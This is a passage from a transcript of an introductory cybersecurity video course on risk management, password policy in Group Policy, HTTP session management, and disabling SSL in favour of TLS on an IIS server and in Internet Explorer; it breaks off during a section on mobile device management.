Uploaded by xianwen_kuo

Cybersecurity 101: Session & Risk Management Course

advertisement
Cybersecurity 101: Session & Risk
Management
A structured approach to security allows for the efficient management of security
controls. In this 13-video course, you will explore assets, threats, vulnerabilities,
risk management, user security and session management, data confidentiality, and
encryption. Key concepts covered in this course include how to identify, assess,
and prioritize risks; how to implement security controls to mitigate risk; and
learning about account management actions that secure the environment. Next,
learn how to use Group Policy to implement user account hardening and configure
the appropriate password security settings for those accounts in accordance with
organizational security policies; learn how HTTP session management can affect
security; and observe how to harden web browsers and servers to use TLS
(transport layer security). Then learn how centralized mobile device control can
secure the environment; learn encryption techniques used to protect data; and
observe how to configure a virtual private network (VPN) to protect data in motion.
Finally, learn how to configure and implement file encryption to protect data at
rest; and how to configure encryption and session management settings.
Course Overview
[Video description begins] Topic title: Course Overview. Your host for this session
is Dan Lachance, an IT Consultant and Trainer. [Video description ends]
Dan Lachance has worked in various IT roles since 1993, including as a technical
trainer with global knowledge. A programmer, consultant as well as an IT tech
author and editor from McGraw-Hill and Wiley Publishing. He has held and still
holds IT certifications in Linux, Novell, Lotus, CompTIA and Microsoft.
His specialties over the years have included networking, IT security, cloud
solutions, Linux management and configuration and troubleshooting across a wide
array of Microsoft products. Most end users have a general sense of IT security
concepts, but today's IT systems are growing ever larger and more complex.
So now more than ever, it's imperative to have a clear understanding of what digital
assets are and how to deal with security threats and vulnerabilities. Users need to
acquire the skills and knowledge to apply security mitigations at the organizational
level. In this course, Dan Lachance will explore how a structured approach to
security allows for the efficient management of security controls. Specifically, he'll
cover risk management, user and session management, and encryption.
Asset, Threats, and Vulnerabilities
[Video description begins] Topic title: Asset, Threats, and Vulnerabilities. The
presenter is Dan Lachance. [Video description ends]
Today's IT systems are growing ever larger and more complex. And so it's
important to protect digital assets. IT security or cybersecurity is really based on
the protection of assets. We want to protect against threats that might render IT
systems unusable. We want to protect against the theft of intellectual property or
the theft of Personally Identifiable Information (PII), which includes things like
credit card numbers, street addresses, mother's maiden name. We want to protect
against the theft of Protected Health Information, PHI, which as the term implies, is
medically related information, medical insurance coverage, medical procedures
performed, and so on.
Digital assets have a perceived value to the organization. And it's critical that an
up-to-date inventory of these digital assets is maintained by the organization.
Because what might not have value what one point in time could have great value
down the road at a different point in time. Digital assets can include things like IT
systems, unique IT processes, programming code, and of course, data. This data,
again might not have a perceived value immediately, but could down the road, such
as gathering user's shopping habits, for example, might not have a lot of value
initially in the first quarter that it's gathered.
But after a few years, we start to be able to perform a trend analysis to see what
consumer shopping habits really turn out to be. And so they can have value down
the road, where it might not right now. IT vulnerabilities are weaknesses, and often
they are based on user error. User awareness and training is a great defense against
many security breaches, especially against social engineering or deceptive practices
by malicious users where they're trying to trick users into clicking a link or
supplying sensitive information over the phone, or opening a file attachment in an
email.
We also have to consider vulnerabilities related to products that get shipped with
default settings that aren't secure. Things like home wireless routers are a great
example where the default username and password might be in place. And unless
the user changes it, it's still in effect even when it's plugged in a user's home. And
as a result, it doesn't take very much to determine what the default credentials are to
hack into that type of a system. With today's proliferation of Internet of Things or
IoT devices, which essentially includes pretty much anything that can connect to
the Internet, such as home automation systems, baby monitor, smart cards, and so
on.
The problem with a lot of these is that they're designed to be simple to use, and as a
result, don't have a lot of security built in. And in some cases, the firmware within
these IoT devices isn't even updateable. Other vulnerabilities can come in the form
of configuration flaws. An example of this could be hosts or entire networks that
aren't hardened. Hardening means we're reducing the attack surface. In other words,
we're trying to lock down a system or a network environment, perhaps by patching
it, by removing unnecessary services, maybe by putting it on a protected network,
and so on.
Examples of IT threats would include Denial of Service or DoS attacks, and its
counterpart, Distributed Denial of Service, or DDoS attacks, which includes a
number of machines. It could be dozens, hundreds, or even thousands under
centralized control of a malicious user. The malicious user can then send
instructions to that collection of machines under his or her control, which is called a
zombie net or a botnet. And then those bots, or zombies can then go out and
perhaps, flood a victim network with useless traffic.
And therefore, it's Denial of Service for legitimate users of that service. Other
threats, of course include malware whether it's things like spyware or worms. There
is a lot of cases of ransomware over the last few years that might encrypt, sensitive
data files. And if you don't provide in a Bitcoin payment, you won't receive a
decryption key. And often, there is no guarantee that you will receive the key
anyway even if you do submit this Bitcoin untraceable payment.
Other IT threats include data loss, whether it's intentional or unintentional, such as
a user mistakenly sending a sensitive email file attachment to people outside of the
company. Then we have security controls that are put in place to mitigate threats,
but then over time, might not be as secure as they were initially. Now, examples of
security controls that can mitigate threats would include the encryption of data at
rest using an encryption solution, such as those built into operating systems like
Microsoft BitLocker or Microsoft Encrypting File System.
Risk Management
[Video description begins] Topic title: Risk Management. The presenter is Dan
Lachance. [Video description ends]
Risk management is an important part of cybersecurity. It relates to the protection
of digital assets like IT systems, and the data that they produce and process. Any
business endeavor will always have some kind of potential threats. The key is to
properly manage the risk against those digital assets. So, we have to have
acceptable security controls in place to protect assets, at a reasonable cost. Risk
management first begins with the identification of both on-premises and cloud
assets. This would include things like personnel. Nothing is more important than
people.
Followed by things like business processes that might be unique within the
industry. IT systems and data. We also have to consider data privacy laws and
regulations that might need to be complied with, in the protection of these IT
systems and data. Next we need to identify threats against the assets. So threats
against personnel safety, or data theft, or systems being brought down. So that
would result in system down time which certainly has a cost associated with it. We
then need to determine the likelihood that these threats would actually occur, so we
need to prioritize the threats.
This way, we are focusing our energy and our resources on what is most likely to
happen, which makes sense. So what are some examples of potential threats? Well,
any threat that is going to have a negative business impact, such as an e-commerce
web site being down for a number of hours. Which means that we can't sell our
products or services if that site is down. When we say that site, we're normally
referring to a farm of servers sitting behind a load balancer in most cases. We might
also experience a power outage. That is also another type of threat, or a hardware
failure.
There could be a software failure within the operating system. Or a driver within
the operating system can cause a failure or a malfunction of some kind. Of course,
we also have to consider malware infections as a realistic threat. Or the system
being compromised by a malicious user, which then means they could steal data.
Or they might use it for Bitcoin mining, which would slow down our system. Of
course, there are always natural disasters, like floods or fires or bad weather that
can cause problems and result in downtime. Of course, there are then man-made
disasters such as arson, fires set on purpose, or terrorist attacks or anything of that
nature.
[Video description begins] Risk Prioritization. [Video description ends]
So the next thing is to prioritize the risks and categorize them via a risk registry.
Which is essentially a centralized document that will show all of the risks, and how
they are categorized or prioritized. So we might determine then that software
failure is the most likely threat, followed by hardware failure, maybe followed by
power outages, malware infections, natural disasters, and finally man-made
disasters. This could be based on regional history where our premises are located,
as well as past incidents that might have occurred in our environment.
[Video description begins] Risk Management. [Video description ends]
The next thing to consider is to implement cost-effective security controls. A
security control is put in place to reduce the impact of a threat. And we have to
make sure that the risk is accepted in order for this to happen in the first place. If
we choose not to engage in a specific activity because it's too risky, well then, if
we're not engaging in that activity, there is no need to implement a security control.
We always have to think about legal and regulatory compliance regarding security
controls.
For example, if we're in the retail business dealing with credit cards and debit
cards, then the PCI DSS standard, which affects merchants dealing with card holder
data. We would have to take a look at how we would protect assets such as
customer card information, whether we encrypt network traffic or encrypt data at
rest. And often a lot of these standards will state that data must be protected, but
won't specify exactly what should be used to do it.
Often, that is left up to the implementers. It's important to always monitor the
effectiveness of implemented security controls via periodic security control
reviews. Just like digital assets over time can increase in value, in the same way our
implemented security controls can be reduced in terms of their effectiveness at
mitigating a threat. So it's always important to monitor these things over time.
Map Risks to Risk Treatments
[Video description begins] Topic title: Map Risks to Risk Treatments. The presenter
is Dan Lachance. [Video description ends]
Securing IT resources means proper risk management. Proper risk management
means mapping risks to risk treatments. Risk treatments include things like risk
acceptance, risk avoidance, risk transfer, and risk mitigation. We're going to talk
about each of these. We're going to start with risk acceptance. With risk
acceptance, we are not implementing any type of specific security control to
mitigate the risk. Because, the likelihood or the realization of that threat is so low
that it doesn't require it. And should that threat materialize, the negative impact to
the business might also be very low.
And so we accept the risk as it is in engaging in that particular activity. Some
potential examples of this include the hiring of new employees. Now performing
our due diligence with background checks before hiring might be considered a
separate activity than the actual hiring of itself. Which is why hiring new
employees might not require any types of security controls. Company mergers and
acquisitions can also fall under this umbrella. Under the presumption that
organizations have already done their due diligence to manage risk appropriately in
their own environments. Using software that is known to have unpatched
vulnerabilities, yet we still choose to use that software in an unpatched state.
Well, we might do that because the possibility of that threat being realized is so
low. Risk avoidance is related to risks that introduce way too high of a possibility
of occurrence beyond the organization's appetite for risk. So what we're doing with
risk avoidance then is we are removing the risk, because we are not engaging in the
activity that introduces that high level of risk. As an example, we might stop using
a currently deployed operating system, such as Windows XP, because there are too
many vulnerabilities now. Maybe there weren't initially, but there are now.
And so we're going to upgrade to a newer secure version. Now, in one aspect, we
are avoiding the risk because we are no longer using Windows XP. But at the same
time, you could argue that we might be mitigating the risk by upgrading to a new
version of Windows, such as Windows 10. So it really depends on your
perspective. Risk transfer essentially means that we are outsourcing responsibility
to a third party. Like an example of this, these days it's cyber liability insurance
related to security breaches, where the monthly premiums can actually be reduced
if you can demonstrate that you've got deployed security controls that are effective
in mitigating risks.
It can relate to online financial transactions, customer data storage, medical patient
data storage. Also, if we decide to outsource some on-premises IT solutions to the
public cloud, to a degree, there is risk transfer. Because we have service level
agreements or SLA contracts with cloud providers that guarantee specific levels of
uptime for the use of some different cloud services. Bear in mind that the variety of
cloud services available out there is large and each one of them has a different SLA
or service level agreement.
Risk mitigation means that we are applying a security control to reduce the impact
if the risk is realized. An example of this would be firewall rules that block all
incoming connections initiated from the Internet. And this might be required by
organizational security policies, by laws, and by regulations. So it's important, then,
that we apply the appropriate risk treatment, given that we have an understanding
of the risk associated with engaging in specific activities.
User Account Management
[Video description begins] Topic title: User Account Management. The presenter is
Dan Lachance. [Video description ends]
User account management is a crucial part of cybersecurity. It's important that it
should be done correctly because if user accounts are not managed correctly, if
they're not secured properly, malicious users could gain access to user accounts,
which could ultimately lead to the compromise of a sensitive system and its data.
[Video description begins] User Account Management. [Video description ends]
User accounts can be managed manually. Usually this is in the form of a GUI, a
graphical user interface where administrators can click and drag and work with user
accounts. You might imagine doing this in a Microsoft Active Directory
environment using the Microsoft Active Directory Users and Computers GUI tool.
But user account management can also be automated. For example, technicians
might build a Microsoft PowerShell script to check for users that haven't logged on
for more than 90 days. Or, in a UNIX or Linux environment, a Shell script might be
written.
Looking for user accounts that have read and write permissions to the file system.
We can also have centralized management solutions in an enterprise that can be
used to push out settings related to user accounts. Especially those related to
password strength. It's important that every user have their own unique user
account and that we don't have any shared logins. This way we have accountability
when we start auditing usage. If we audit usage of a shared account and we realize
that in the middle of the night, Saturday night, someone is doing something they
shouldn't be doing to a database, we have no way of really knowing who it is, if
that account is a shared account.
So keep unique user accounts in place. Also we want to make sure we adhere to the
principle of least privilege. This is easier said than done because it's very
inconvenient as it's usually the case with anything that means better security. What
this means is that we want to grant only the permissions that are required to
perform a task, whether it's to a user, to a group, to a service account. Now this
requires more effort because we might have to give specific privileges to other
specific resources for that account, so it takes more time.
But the last thing you want to do for example in a Windows environment is simply
add a user to the administrator's group on a local Windows machine, just to make
sure they have rights to do whatever they need to do. Not a great idea. The next
thing would be password settings, which we mentioned could be managed
centrally. Such as through tools like Microsoft Group Policy where we can set a
minimum password length, password expiration dates, whether or not passwords
can be reused.
Multifactor authentication is crucial when it comes to user account management,
instead of the standard username and password, which constitute something you
know, we know it's two items, that is single factor authentication. Multifactor
authentication uses authentications from different categories like something you
know and something you have. And a great example of this, and it's prevalent out
there often, for example when you sign into a Google account, you'll have to know
a username and a password and then Google will send an authentication code to
your smartphone.
And so, you then have to specify that code as well. You have to have that
smartphone as well as knowledge of the username and password to be able to sign
in successfully. User account should also have expiry dates when applicable. An
example of this would be hiring co-op students that are finishing their studies and
need some work-term experience. So we might want to set an expiry on those
accounts where we know that they have a limited lifetime. It's important to audit,
not only user account usage but also the file system, networks, servers, access to
data such as in databases.
All of this can be tied back to user accounts. But what we want to make sure we do
is we want to make sure that we are selective in which users we choose to audit and
which actions for each user. Because otherwise it could result in audit alert message
fatigue, if you're always getting audit messages about someone opening a file.
Maybe that is not relevant. So we need to think carefully about how to configure
our auditing as it relates to users.
Deploy User Account Security Settings
[Video description begins] Topic title: Deploy User Account Security Settings. The
presenter is Dan Lachance. [Video description ends]
One way to harden user accounts is to configure the appropriate password security
settings for those accounts in accordance with organizational security policies. If
you're a Microsoft shop, you might use a Microsoft Active Directory Domain that
computers are joined to so they can pull down central settings from Group Policy,
such as security settings. That is exactly what I'm going to do here in Windows
Server 2016.
Let me go over to my Start menu and fire up the Group Policy Management tool.
Now this is a tool that can also be installed on workstations. You don't have to do it
on the server, but it will be present automatically on servers that are configured as
Microsoft Active Directory Domain controllers. When I fire up Group Policy, I get
to specify the Group Policy Object or the GPO in which I want to configure the
settings.
[Video description begins] The Group Policy Management window opens. The
window is divided into three parts. The first part is the toolbar. The second part is
the navigation pane. It contains the Group Policy Management root node which
contains the Forest: fakedomain1.local node, which further contains Domains and
Sites subnodes, Group Policy Modeling and Group Policy Results options. The
Domains subnode includes fakedomain1.local, Admins, and Domain Controllers
subnodes. The fakedomain1.local subnode is expanded and it contains the Default
Domain Policy option. The Default Domain Policy option is selected and open in
the third part. It contains four tabs: Scope, Details, Settings, and Delegation. The
Scope tab is selected. It is further divided into three sections. The first section is
Links, which contains the Display links in this location drop-down list box and a
table with Location, Enforced, Link Enabled, and Path column headers and one
row. The values fakedomain1.local, No, Yes, and fakedomain1.local are displayed
under the Location, Enforced, Link Enabled, and Path column headers,
respectively. The second section is Security Filtering. It includes a table with Name
column header and one row, with the value Authenticated Users. It also includes
three buttons: Add, Remove, and Properties. The third section is WMI Filtering. It
contains a drop down list box and Open button. [Video description ends]
Every Active Directory Domain has what is called a Default Domain Policy.
[Video description begins] He points to the Default Domain Policy option. [Video
description ends]
That is a GPO, a Group Policy Object, and notice that hierarchically, it's indented
directly under my Active Directory Domain.
[Video description begins] He points to the fakedomain1.local subnode. [Video
description ends]
So therefore, the settings in this Default Domain Policy will apply to all users and
computers in the entire Active Directory Domain by default, unless it's configured
otherwise, but that is the default behavior. So if you're going to configure password
settings in Active Directory using Group Policy, you have to configure them in the
Default Domain Policy.
Other GPOs that you might link with specific organizational units that contain
users and computers like Chicago or Boston or LasVegas, while you can configure
other settings that can apply to just those hierarchical levels of AD, Active
Directory, password settings won't work.
[Video description begins] He points to these options under the fakedomain1.local
subnode. [Video description ends]
You've got to do it in the Default Domain Policy because, well, that is just the way
it is. So I'm going to go ahead and right-click on the Default Domain Policy and
choose Edit. You'll find that the bulk of security settings are not at the User
Configuration level but rather at the Computer Configuration level. So under
Computer Configuration, I'm going to drill down under Policies, and then I'm going
to go down under Windows Settings.
[Video description begins] The Group Policy Management Editor window opens. It
is divided into three parts. The first part is the toolbar. The second part is the
navigation pane. It contains the Default Domain Policy [SRV20161.FAKEDOMAIN1.LOCAL] Policy root node which contains two nodes, Computer
Configuration and User Configuration. The Computer Configuration node contains
the Policies and Preferences subnodes. The User Configuration node contains the
Policies and Preferences subnodes. The third part contains two tabs, Extended and
Standard. [Video description ends]
After that opens up, I'll then be able to drill down and see all of the security settings
that are configurable.
[Video description begins] The Windows Settings subnode includes the Name
Resolution Policy, Deployed Printers, and Security Settings subnodes. [Video
description ends]
So I'll expand Security Settings and we'll see all kinds of great stuff here including
Account Policies. So I’ll drill down under that, and I'm going to click on the
Password Policy.
[Video description begins] The Security Settings subnode includes the Account
Policies, Local Policies, and Event Log subnodes. He expands the Account Policies
subnode and it contains Password Policy, Account Lockout Policy, and Kerberos
Policy subnodes. He clicks the Password Policy subnode and a table is displayed in
the third part of the window. The table contains two columns and six rows. The
column headers are Policy and Policy Setting. The Policy column header includes
the Enforce password history, Minimum password age, and Minimum password
length values. [Video description ends]
Over on the right, I can determine the password settings I want applied at this
domain level which will apply to all the users and computers in the domain by
default. Now it might take an hour and a half, two hours, three hours depending on
your environment and how it's set up.
It's not going to be immediate once you configure it, but these settings will be put
into effect. So what I'm going to do here, is start with the Minimum password
length, which is currently set at 0 characters, that is terrible. So I'm going to go
ahead and double-click on that, and I'm going to say that it needs to be a minimum
of 16 or 14 characters.
[Video description begins] The Minimum password length Properties dialog box
opens. It contains two tabs: Security Policy Setting and Explain. The Security
Policy Setting tab is selected. It includes a Define this policy setting checkbox and
No password required spin box. It also includes OK, Cancel, and Apply buttons.
The Define this policy setting checkbox is selected. [Video description ends]
Now, if I try to go beyond 14, it maxes out.
[Video description begins] He enters the value 14 in the No password required spin
box. The name of the spin box changes from No password required to Password
must be at least. [Video description ends]
Now depending on add-on extensions you might have installed, other additional
products besides just what you get with Active Directory, you'll have different
settings that you can apply here. So here, I'm going to have to be happy with 14
character passwords. Your users won't be happy, but that doesn't matter, the
environment will be more secure.
[Video description begins] He clicks the OK button and the Minimum password
length Properties dialog box closes. [Video description ends]
The next thing I can do is turn on password complexity. Now, that is already turned
on, which means we don't want to allow simple passwords to be used.
[Video description begins] He double-clicks the Password must meet complexity
requirements value and the Password must meet complexity requirements
Properties dialog box opens. It contains two tabs: Security Policy Setting and
Explain. The Security Policy Setting tab is selected. It contains Define this policy
setting checkbox and two radio buttons, Enabled and Disabled. Define this policy
setting checkbox and Enabled radio button are selected. [Video description ends]
In other words, we want to be able to use a mixture of upper and lowercase letters
and symbols and so on. When you're configuring Group Policy, notice that you'll
always have an Explain tab at the top so you can see what that specific setting will
do. And here we see what the password complexity settings entail. So we've got
that setting, that is fine, it was already done.
[Video description begins] He clicks the OK button and the Password must meet
complexity requirements Properties dialog box closes. [Video description ends]
I'm also going to set a Minimum password age here to 5 days.
[Video description begins] He double-clicks the Minimum password age value and
the Minimum password age Properties dialog box opens. It includes a Define this
policy setting checkbox and Password can be changed immediately spin box. It also
includes OK, Cancel, and Apply buttons. The Define this policy setting checkbox is
selected. [Video description ends]
Because as soon as a user is forced to change a password, I don't want them to go
and change it right away to something else that they know that is easier to use.
[Video description begins] He enters the value 5 in the Password can be changed
immediately spin box and the name of the spin box changes to Password can be
changed after:. [Video description ends]
I'm also going to set a Maximum password age in accordance with organizational
security policies.
[Video description begins] He clicks the OK button and the Minimum password
age Properties dialog box closes. He double-clicks the Maximum password age
value and the Maximum password age Properties dialog box opens. It includes a
Define this policy setting checkbox and Password will not expire spin box. It also
includes OK, Cancel, and Apply buttons. The Define this policy setting checkbox is
selected. [Video description ends]
Maybe every 30 days, this needs to be changed.
[Video description begins] He enters the value 30 in the Password will not expire
spin box and the name of the spin box changes to Password will expire in. He clicks
the OK button and the Maximum password age Properties dialog box
closes. [Video description ends]
I can also Enforce password history so people can't keep reusing the same
passwords. Maybe it will remember the last eight passwords.
[Video description begins] He double-clicks the Enforce password history value
and the Enforce password history Properties dialog box opens. It includes a Define
this policy setting checkbox and Do not keep password history spin box. It also
includes OK, Cancel, and Apply buttons. The Define this policy setting checkbox is
selected. He enters the value 8 in the Keep password history spin box and the name
changes to Keep password history for:. He clicks the OK button and the dialog box
closes. [Video description ends]
So all of these settings are now saved into Group Policy within the Default Domain
Policy. So what this means is as machines refresh Group Policy, which they do
automatically by default, approximately every 60 to 90 minutes, then they will see
this change, and it will be put into effect.
HTTP Session Management
[Video description begins] Topic title: HTTP Session Management. The presenter
is Dan Lachance. [Video description ends]
HTTP stands for HyperText Transfer Protocol. It's the protocol that is used between
a web browser and a web server as they communicate back and forth. The secured
version of it is HTTPS, which can use SSL or ideally TLS, Transport Layer
Security, to secure that communication. HTTP/1.0 is considered stateless. What
this means is that, after the web browser makes a request to the web server and the
web server services it, the communication stops, the session isn't retained.
[Video description begins] Communication stops upon HTTP transaction
completion. [Video description ends]
And so the way that we get around this is by using web browser cookies. These are
small files on the client web browser machine that can retain information.
References for a user for a web site, things like the preferred language, but also
session state information between invocation of HTTP requests. So it might have a
session ID that is encrypted after the user successfully authenticates to a secured
web site.
And that would be in the form of a security token, then that cookie data, such as the
token, can then be submitted to web servers for future transactions. Now, there is
usually a timeout involved with this, and you might be familiar with this if you've
ever conducted online banking. After you authenticate to online banking, for a few
minutes you can continue doing your online banking without having to
reauthenticate. But if you step away from your station for a few minutes and don't
log out, when you come back you'll have to reauthenticate. So usually this cookie
data has a specific lifetime.
HTTP/2 does support what are called persistent HTTP connections. Also they're
called HTTP TCP connection reuse settings or HTTP keep-alive, which is enabled
through an HTTP header. All of this really means the same thing. It means that
instead of having a single connection between a web browser and a web server that
terminates after the server services the request, we have the connection that isn't
always treated like it's new every time the web browser sends a request to the
server.
[Video description begins] Programmatic session management. [Video description
ends]
So this can also be done programmatically. Developers can use language and
platform-specific APIs, so if they're working in Tomcat Java servlets, for example,
where they can enable HTTP session management. So what we're really doing is
taking a bunch of network communications between the browser and the server and
treating it as the same session. So, this can be done using HTTP session IDs, and
again, this is what you'll often see cookies used for, for secured web sites.
So this way, it allows the web server to track sessions from the client across
multiple HTTP requests. Because as we know, generally speaking, certainly in the
case of HTTP/1.0, it is considered stateless or connectionless. So the session ID,
where could this be stored? Well, it could actually be stored in a form field on a
web form. It might even be a hidden field. Often it's stored in a cookie. It could also
be embedded within a URL, and when it is, that is called URL rewriting.
HTTP session IDs must not be predictable in order for the use of them to be
considered secure. So they shouldn't be sequential, and they shouldn't be
predictable by using some kind of a mathematical formula to always predict the
next value that is going to be used for a session ID. Now, remember that the way
session IDs are used is after a user has successfully authenticated to a site, a web
application. In the future during that session, the client will send the session ID to
identify its authenticated state so that the server knows it's authorized to do things.
So the server then can maintain session information for that specific ID. The other
consideration to watch out for is HTTP session hijacking, also called cookie
hijacking.
What happens is attackers can take over an established active HTTP session. They
need the session ID, which could be stored under cookie. So imagine that somehow
we manage to trick a user into clicking a link on a malicious web site that executes
some JavaScript on the client machine in the web browser. Now, when JavaScript
executes in a web browser, it is limited in terms of what it can do. But one of the
things it will be able to do is to take a look at any cookies and send them along to a
server.
So if a user's browser session is compromised and they've already got an
authenticated connection, then there is a possibility that we could have some
tampering take place where that session ID could be replayed or sent out to perform
malicious acts. Such as depositing money into an anonymous account or sending it
through Bitcoin over the Internet that the attack would have access to. So as we
know, session ID should never be predictable, otherwise, they are really susceptible
to session hijacking. So how could this session hijacking occur?
We've already identified that it could be client-side malicious web browser scripts
that the user is somehow tricked into executing. Such as, visiting a web site that has
some JavaScript on it. It could also be malware that runs within the operating
system. Might not have to be sandboxed to just the web browser session itself.
Another aspect of HTTP session management is to disable SSL, Secure Sockets
Layer, on clients and on servers.
[Video description begins] Disable SSL on Clients and Servers. [Video description
ends]
In the screenshot, in the Windows environment, we've got some advanced Internet
settings where we have the option of making sure that SSL or Secure Sockets
Layer, is not enabled, which is the case here in the screenshot.
[Video description begins] A screenshot of Internet Properties dialog box is
displayed. It includes the General, Security, Content, and Advanced tabs. The
Advanced tab is selected. It consists of the Settings section and the Restore
advanced settings button. The Settings section includes the Use SSL 3.0, Use TLS
1.0, Use TLS 1.1, and Use TLS 1.2 checkboxes. The Use TLS 1.0, Use TLS 1.1, and
Use TLS 1.2 checkboxes are selected. [Video description ends]
Even SSL version 3, the last version of SSL, is not considered secure. There are
known vulnerabilities, and it's really a deprecated protocol. So we should be using,
where possible, the newest version of TLS, Transport Layer Security, which
supersedes SSL. There are even vulnerabilities with TLS 1.0, so even it shouldn't
be used. But remember, here we're seeing settings on the client side, the service
side also needs to be configured for it. Now, you might wonder, why is there any
SSL 3.0 or TLS 1.0 still out there? Backwards compatibility with older browsers or
older software, but ideally, SSL should not be used at all in this day and age.
Configure SSL and TLS Settings
[Video description begins] Topic title: Configure SSL and TLS Settings. The
presenter is Dan Lachance. [Video description ends]
In this demonstration, I'll be configuring SSL and TLS settings. SSL and TLS are
protocols that are used to secure a connection given a PKI certificate. So there is
really no such thing as an SSL certificate or a TLS certificate even though people
call it that. It's not specified that we have to use SSL with a given certificate or
TLS. So the same certificate can be used for both or for either. So let's start here on
a Microsoft IIS web server. The first thing I'm going to do on my server is go into
the registry editor. So I'm going to start regedit.
[Video description begins] The Registry Editor window opens. It is divided into two
parts. The first part is the navigation pane and the second part is the content pane.
The navigation pane contains the Computer root node which includes
HKEY_CLASSES_ROOT, HKEY_CURRENT_USER, and
HKEY_LOCAL_MACHINE nodes. The HKEY_LOCAL_MACHINE node is
expanded and it includes HARDWARE, SECURITY, and SYSTEM subnodes. The
SYSTEM subnode is expanded and it includes ActivationBroker and
CurrentControlSet subnodes. The CurrentControlSet subnode is expanded and it
includes Control subnode. The Control subnode is expanded and it includes
SecurityProviders subnode. The SecurityProviders subnode is expanded and it
includes SaslProfiles and SCHANNEL subnodes. The SCHANNEL subnode is
expanded and it includes Ciphers and Protocols subnodes. The Protocols subnode
is expanded and it contains SSL 2.0 subnode. The SSL 2.0 subnode further contains
Client subnode. The second part contains a table with Name, Type, and Data
column headers. [Video description ends]
And here in regedit, I've already navigated to HKEY_LOCAL_MACHINE,
SYSTEM, CurrentControlSet, Control. Then what I want to do is go all the way
down to SecurityProviders, SCHANNEL, Protocols. And here we see, for example,
SSL version 2.0 is listed here. However, we can add entries here to determine, for
instance, whether we want to disable SSL version 3.
[Video description begins] He points to the Protocol subnode. [Video description
ends]
And that is definitely something that we want to be able to do. SSL 3 has a lot of
known vulnerabilities, and as such, it's considered deprecated. So we really should
be disabling it on the server. So to do that, here under Protocols, I'm going to build
some new items. I'm going to right-click on Protocols, choose New > Key and I'm
going to call it SSL 3.0. Under which, I'll then create another key and it's going to
be called Server, because we're configuring the server aspect of it.
[Video description begins] He right-clicks the SSL 3.0 folder and a shortcut menu
appears which includes the New option. He hovers over the New option and a
flyout menu appears. It includes Key, String Value and Binary Value
options. [Video description ends]
And then I'm going to configure a DWORD value here under Server, so I'll rightclick on that, New > DWORD (32-bit) Value.
[Video description begins] He selects the Key option. A new folder appears under
the SSL 3.0 folder and he names it Server. [Video description ends]
And this one is going to be called DisabledByDefault.
[Video description begins] He right-clicks the Server folder and a shortcut menu
appears. He hovers over the New option and a flyout menu appears. He clicks the
DWORD (32-bit) Value option. A new row appears. The values REG_DWORD and
0x00000000 (0) appear under the Type and Data column headers. He enters the
value DisabledByDefault under the Name column header. The Edit DWORD (32bit) Value dialog box opens. It includes Value name and Value data text boxes. It
includes Base section with two radio buttons, Hexadecimal and Decimal and OK
and Cancel buttons. The value DisabledByDefault is displayed in the Value name
text box and the Hexadecimal radio button is selected. [Video description ends]
And I'm going to set that to a value of 1.
[Video description begins] He enters the value 1 in the Value data text box and
clicks the OK button and the Edit DWORD (32-bit) Value dialog box closes. The
value under the Data column header changes from 0x00000000 (0) to 0x00000001
(1). [Video description ends]
And I'm going to add another item here, I'll build another new DWORD value. This
one is going to be called Enabled and we're going to leave that at a value of 0.
[Video description begins] He right-clicks the Server folder and a shortcut menu
appears. He hovers over the New option and a flyout menu appears. He clicks the
DWORD (32-bit) Value option and a new row appears. The values REG_DWORD
and 0x00000000 (0) appear under the Type and Data column headers. He enters
the value Enabled under the Name column header. [Video description ends]
So in other words, SSL 3.0 is not enabled. Now, you want to be careful when you
do this type of thing because depending on what other components need to talk to
the web server, like older versions of Microsoft SQL server, and older web
browsers, and what not, they might need to see SSL 3 on the server to function
properly. But at the same time, there are lot of known vulnerabilities. So ideally, it
shouldn't be used and you should upgrade the components that might require SSL
3.
Now, we could do the same thing for enabling TLS, Transport Layer Security,
which supersedes SSL by adding the appropriate keys and values here in the
registry, and then of course restarting the server. Then there is the web browser
side, so let's take a peek at that. I'm going to fire up Internet Explorer on this server.
And the first thing I'm going to do is enter http:// and then this hostname. And
notice we have access to it, but this is not an HTTPS or a secured connection, so it's
not even trying to use SSL or TLS.
[Video description begins] The host name is srv2016-1.fakedomain1.local/. [Video
description ends]
Now, I know that it's configured on my server, so I'm going to change the URL
prefix to https. Now we get a message about the page, page can't be displayed, and
then it tells me, we'll take a look at your settings here in the browser. Okay, I'll do
that. I'm going to go ahead and click the settings icon in the upper, right here in
Internet Explorer. I'm going to go down to Internet options. Then I'm going to go to
the Advanced tab and kind of scroll down under the Security section, and notice
that we don't have any check marks for SSL 3.
[Video description begins] The Internet Options dialog box opens. It contains seven
tabs: General, Security, Privacy, Content, Connections, Programs, and Advanced.
He clicks the Advanced tab. It includes a Settings section, which includes Use SSL
3.0, Use TLS 1.0, and Use TLS 1.1 checkboxes and Restore advanced settings
button. It also includes the Reset Internet Explorer settings section, which includes
a Reset button. [Video description ends]
Well, that is good. But we also don't have any for TLS. So for example, I should
really stay away from TLS 1.0 too. So I´ll turn on the check marks to use TLS 1.1
and 1.2. Again, the only time you might turn on the other ones is if you absolutely
have no choice for backwards compatibility. But I do have a choice here, so I´m not
turning those on. I'm going to click OK and I'm going to refresh this page again.
[Video description begins] The Internet Options dialog box closes. [Video
description ends]
And notice now, it lets me in.
[Video description begins] The IIS Windows Server web page opens. [Video
description ends]
So there is a negotiation. There is a handshake when a web browser tries to make a
secured connection to some kind of a secured server, in this case, a web server over
HTTPS. And both of the ends of the connection, the server and the client, have to
agree ideally on the highest level of security that is supported. And that is where a
lot of vulnerabilities in the past have kicked in where attackers can force that
handshake to lower the security, to downgrade the security, for example, down to
SSL 3 during the negotiation. So they could take advantage of vulnerabilities. That
is not the case here the way we've configured it.
Mobile Device Access Control
[Video description begins] Topic title: Mobile Device Access Control. The
presenter is Dan Lachance. [Video description ends]
These days, mobile device usage is ubiquitous, it is everywhere. Whether you're
talking about a laptop, a tablet, and certainly that is the case with smartphones.
Now, the problem with mobile devices, yes, they do allow people to be productive,
even when they're out of the office. However, it can introduce organizational
security risks.
Especially in the case of BYOD, bring your own device, where users can use their
personal mobile device like a laptop or a smartphone, and they can use that against
organization's systems. They can do work using their personal system. The problem
with this is that the IT department didn't have a chance to set this up from the
beginning and secure every aspect of it. And that personal device is also going to
be connected to home networks that might not be secured or public Wi-Fi hotspots
and so on. And so malware could be introduced to it which in turn could infect an
organization production network when that mobile device connects. So, what do we
do about this?
We can use a mobile device management, or an MDM solution. This is a
centralized way for us to manage a multitude of mobile devices. Such as iOS
smartphones, or Android smartphones, or Windows phones, it doesn't matter. Now,
in the case of Microsoft, we can do this to a degree using System Center
